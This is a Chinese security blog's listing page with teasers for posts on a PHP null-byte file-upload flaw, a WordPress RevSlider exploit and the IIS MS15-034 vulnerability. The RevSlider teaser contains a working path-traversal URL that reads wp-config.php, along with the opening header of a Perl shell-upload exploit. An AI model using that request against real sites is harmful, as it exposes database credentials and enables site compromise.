PHP任意文件上传漏洞

分类:安全 | 2015-04-18 | 撸过 1,304 次
2人扯谈

漏洞细节:

这个漏洞存在于php中一个非常常用的函数中:move_uploaded_files,开发者总是用这个函数来移动上传的文件,这个函数会检查被上传的文件是否是一个合法的文件(是否是通过 HTTP 的 post 机制上传的),如果是合法的文件,则将它一定到指定目录中。

例子:

move_uploaded_file ( string $filename , string $destination )
这里的问题是,可以在文件名中插入空字符(之前多次修复过这个漏洞,比如CVE-2006-7243),利用插入空字符的方式,攻击者可以上传任意文件,引起远程代码执行漏洞等。

我这里用D[......]

继续阅读

WordPress幻灯片插件RevSlider漏洞利用

分类:安全 | 2015-04-18 | 撸过 1,173 次
0人扯谈

任意读取:

/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

 

任意上传

#!/usr/bin/perl
#
# Title: Slider Revolution/Showbiz Pro shell upload exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Discovered: 15 October 2014
# Coded: 15 October 2014
# Upda[......]

继续阅读

IIS最新高危漏洞POC及在线检测源码-CVE-2015-1635-MS15-034

分类:安全 | 2015-04-18 | 撸过 1,422 次
0人扯谈

HTTP.sys远程执行代码漏洞(CVE-2015-1635,MS15-034)

远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。https://technet.microsoft.com/zh-cn/library/security/MS15-034

 


[......]

继续阅读